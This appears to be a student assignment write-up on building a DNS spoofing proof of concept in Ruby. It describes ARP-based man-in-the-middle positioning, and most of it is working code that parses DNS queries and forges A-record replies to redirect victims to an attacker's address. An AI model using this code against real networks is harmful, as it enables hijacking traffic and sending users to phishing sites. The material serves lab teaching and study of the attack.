Summary & Introduction

The objective of this assignment is to create a simple DNS spoofing application in Ruby (or another language of choice). Using the supplied module on the DNS protocol, together with the design and framework for basic DNS manipulation, we are to build a DNS spoofing application as a proof of concept (PoC). Website spoofing is the main functionality the program requires.

There are a few constraints and they are as follows:

  • Detect DNS queries and respond with a crafted Response (answer) that points the victim to a user (attacker) specified site
  • Handle any arbitrary domain name and return a spoofed Response for it
  • Tests are only conducted on our own machines; no DNS spoofing is carried out against unsuspecting users

Some findings from this assignment are that, when comparing legitimate DNS responses to different queries, the transaction ID and the queried domain name are generally the only values that change. A spoofed response can therefore be built from a fixed template, copying the transaction ID and the question section from the captured query and appending an answer record that points at the attacker's address. In addition, the source and destination ports in the UDP header carrying the DNS reply need to be set appropriately: the (Type A) response must be sent from port 53 with a destination port equal to the source port of the query, otherwise the victim's resolver will not match the reply to its outstanding query. The spoofed reply must also reach the victim before the legitimate answer does, which is why the attacker first places itself on the path with ARP spoofing.

Design

Much of the provided ARP spoof example was preserved, except that the hard-coded source and destination IP/MAC addresses were replaced with values looked up at runtime through the Utils class of the PacketFu library. Beyond the ARP spoofing, extra functionality is required: capturing DNS traffic, extracting the domain name from each query, and replying with a crafted response that redirects the victim to a malicious counterpart of a popular website.
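As an added illustration of the reply construction described in the findings above (transaction ID and question section reused from the query, UDP ports swapped) and of the extract-name-then-reply step in the design, here is a pure-Ruby DNS query parser and response builder. This is example code written for this page, not the assignment's own PacketFu-based program: the packet capture and ARP layers are omitted, the function names are my own, and the query bytes and the spoof address 10.0.0.5 are constructed for the demonstration. Queries for anything other than an A/IN record get an empty answer section rather than a bogus A record.

```ruby
# Added example, not the assignment's code: parse a DNS query and craft the
# spoofed Type A response the write-up describes. Pure Ruby, no PacketFu.
require 'ipaddr'

# Read a DNS name at `offset`, following RFC 1035 compression pointers.
# Returns [name, offset_just_after_the_name_in_the_original_position].
def read_name(data, offset)
  labels = []
  end_offset = nil
  jumps = 0
  loop do
    len = data.getbyte(offset)
    raise 'truncated name' if len.nil?
    if len & 0xC0 == 0xC0                       # compression pointer
      raise 'pointer loop' if (jumps += 1) > 16
      pointer = ((len & 0x3F) << 8) | data.getbyte(offset + 1)
      end_offset ||= offset + 2                 # caller resumes after the pointer
      offset = pointer
      next
    end
    offset += 1
    break if len.zero?                          # root label ends the name
    labels << data.byteslice(offset, len)
    offset += len
  end
  [labels.join('.'), end_offset || offset]
end

# Parse the header and first question of a DNS query payload.
def parse_query(data)
  raise 'short header' if data.bytesize < 12
  id, flags, qdcount = data.unpack('nnn')
  raise 'not a query (QR bit set)' unless flags & 0x8000 == 0
  raise 'no question' if qdcount.zero?
  name, off = read_name(data, 12)
  qtype, qclass = data.byteslice(off, 4).unpack('nn')
  { id: id, flags: flags, name: name, qtype: qtype, qclass: qclass,
    question: data.byteslice(12, off + 4 - 12) }   # raw bytes, echoed verbatim
end

# Build the spoofed response: same transaction ID, QR=1, RD copied, RA=1,
# the question echoed, and one A record for A/IN queries (else no answer).
def build_response(query, spoof_ip, ttl: 300)
  flags = 0x8000 | (query[:flags] & 0x0100) | 0x0080
  answer_a = query[:qtype] == 1 && query[:qclass] == 1
  header = [query[:id], flags, 1, answer_a ? 1 : 0, 0, 0].pack('n6')
  # 0xC00C is a pointer to the question name, which always starts at offset 12.
  answer = if answer_a
             [0xC00C, 1, 1, ttl, 4].pack('nnnNn') + IPAddr.new(spoof_ip).hton
           else
             ''.b
           end
  header + query[:question] + answer
end

# What the sniffer hands back for a captured UDP datagram: the reply payload
# plus the swapped ports (source 53, destination = the query's source port).
def spoof_reply(udp_src_port, udp_dst_port, dns_payload, spoof_ip)
  return nil unless udp_dst_port == 53          # only answer DNS queries
  query = parse_query(dns_payload)
  { src_port: 53, dst_port: udp_src_port, name: query[:name],
    payload: build_response(query, spoof_ip) }
end

# Helpers to construct a sample query (a client would normally send this).
def encode_name(name)
  name.split('.').map { |l| [l.bytesize].pack('C') + l }.join + "\x00".b
end

def build_query(id, name, qtype: 1)
  [id, 0x0100, 1, 0, 0, 0].pack('n6') + encode_name(name) + [qtype, 1].pack('nn')
end

# Constructed sample input: an A query for www.example.com from port 40000.
SAMPLE_QUERY = build_query(0x1234, 'www.example.com')

if __FILE__ == $PROGRAM_NAME
  reply = spoof_reply(40_000, 53, SAMPLE_QUERY, '10.0.0.5')
  puts "spoofing #{reply[:name]} -> 10.0.0.5, UDP #{reply[:src_port]} -> #{reply[:dst_port]}"
  puts reply[:payload].unpack1('H*')
end
```

In the real tool the `payload` and ports would be placed into a PacketFu UDP packet whose IP source is the resolver the victim queried and whose destination is the victim; the compression pointer in the answer keeps the reply small and matches what real resolvers emit.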

Diagram

[diagram image not reproduced here]

Check out the full source code on GitHub.